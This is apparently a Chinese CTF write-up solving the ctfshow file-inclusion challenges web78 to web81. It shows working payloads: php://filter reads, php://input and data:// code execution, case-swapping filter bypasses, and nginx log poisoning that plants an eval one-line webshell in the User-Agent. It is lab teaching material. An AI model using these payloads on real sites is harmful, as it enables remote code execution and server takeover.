目录

1、web78

2、web79

3、web80

4、web81


1、web78

存在文件包含函数:include

直接上 php 伪协议,用 php://filter 读文件(flag.php)的源码,payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

得到:

PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMDo1NToxMQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTA6NTU6MjANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3s3M2JjOTUxNC03MDZmLTRjMWEtOGQ3Ny1iYjRhNDY1NGM1Zjl9Ijs=

base64 解码即可拿到 flag:ctfshow{73bc9514-706f-4c1a-8d77-bb4a4654c5f9}

我们也可以换一种编码方式输出,这样就不用再对结果进行 base64 解码了

payload:

?file=php://filter/convert.iconv.utf8.utf16/resource=flag.php 

2、web79

多了一个 str_replace("php", "???", $file); 会将我们输入的 php 替换为问号 ???

尝试大小写绕过,这里只适用于绕过协议名的 php 但是不适用于文件名,因为 Linux 系统上的 PHP 文件路径区分大小写。

没关系我们使用 php://input 

构造 payload:

?file=pHp://input

post 写入:

<?php phpinfo()?>

 可以看到代码执行成功(注意这里 hackbar 推荐使用 Firefox 的,或者你用 bp 抓包)

如果你用的是谷歌的 hackbar,需要将 mode 开成 raw,否则没有回显

接下来我们修改 post 的 php 代码,读取 flag.php

<?php system('tac flag.php')?>

拿到 flag:ctfshow{6eb28328-d9a9-4c7a-a15b-b8b2d7da6a56}

此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。

构造 payload:

?file=data://text/plain,<?=system("tac flag.php");?>

或者

?file=data://text/plain,<?=`tac flag.php`;

说明: <?= 是 echo() 的别名用法

此外还尝试了短标签,回顾一下 php 短标签:

<? echo '123';?>  #前提是开启配置参数short_open_tags=on
<?=(表达式)?>  等价于 <?php echo (表达式)?>  #不需要开启参数设置
<% echo '123';%>   #开启配置参数asp_tags=on,并且只能在7.0以下版本使用
<script language="php">echo '123'; </script> #不需要修改参数开关,但是只能在7.0以下可用。

但是发现不行,因此继续使用大小写绕过,payload:

?file=data:text/plain,<?pHp system('tac flag.php');?>

最后再看一下题目提示给的 payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

其中 PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs 是 <?php system('cat flag.php'); 的 base64 编码,也可以实现绕过。

3、web80

新增对 data 的过滤,大小写绕过 data 发现不行:

我们使用 pHp://input ,沿用上一题的 payload:

?file=pHp://input

POST 写入:

<?php system('ls')?>

 可以看到 存在 fl0g.php

读取:

<?php system('tac fl0g.php')?>

拿到 flag:ctfshow{159558f9-9375-4a90-ad2e-715075b20bbb}

查看提示:可以日志包含 getshell,可之前一道命令执行的题目很像


对于Apache,日志存放路径:/var/log/apache/access.log
对于Ngnix,日志存放路径:/var/log/nginx/access.log 和 /var/log/nginx/error.log 

读一下这个日志文件:

?file=/var/log/nginx/access.log

 

中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。 

从上面的日志信息可以看出是 User-Agent 的内容,我们在 User-Agent 里插入一句话木马进行提交 :(和 web38 一模一样)

<?php @eval($_REQUEST['cmd']);?>

访问日志文件,调用木马:

命令执行成功,之后我们就可以直接获取 flag 了:

cmd=system('tac fl0g.php');

4、web81

做完这道题,你就已经经历的九九八十一难,是不是感觉很快?
没关系,后面还是九百一十九难,加油吧,少年!

新增过滤分号 :,伪协议不好用了,还是用上一题的日志文件包含 getshell

在 ua 写入一句话木马

调用

拿到 flag:ctfshow{517a0a24-281b-43cc-a6fc-59484e04f3a8}

点赞(0) 打赏

评论列表 共有 0 条评论

暂无评论

微信公众账号

微信扫一扫加关注

发表
评论
返回
顶部